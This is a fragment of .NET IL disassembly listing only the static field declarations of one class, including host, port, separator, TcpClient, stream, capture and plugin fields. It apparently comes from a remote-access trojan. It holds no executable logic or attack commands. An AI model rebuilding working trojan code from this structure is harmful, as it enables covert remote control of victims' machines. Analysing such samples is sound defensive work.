  .field public static string VN
  .field public static string VR
  .field public static object MT
  .field public static string EXE
  .field public static string DR
  .field public static string RG
  .field public static string H
  .field public static string P
  .field public static string Y
  .field public static bool BD
  .field public static bool Idr
  .field public static bool IsF
  .field public static bool Isu
  .field public static class [mscorlib]System.IO.FileInfo LO
  .field public static class [mscorlib]System.IO.FileStream FS
  .field public static class [Microsoft.VisualBasic]Microsoft.VisualBasic.Devices.Computer F
  .field public static class j.kl kq
  .field public static bool Cn
  .field public static string sf
  .field public static class [System]System.Net.Sockets.TcpClient C
  .field private static class [mscorlib]System.IO.MemoryStream MeM
  .field private static uint8[] b
  .field private static string lastcap
  .field public static object PLG
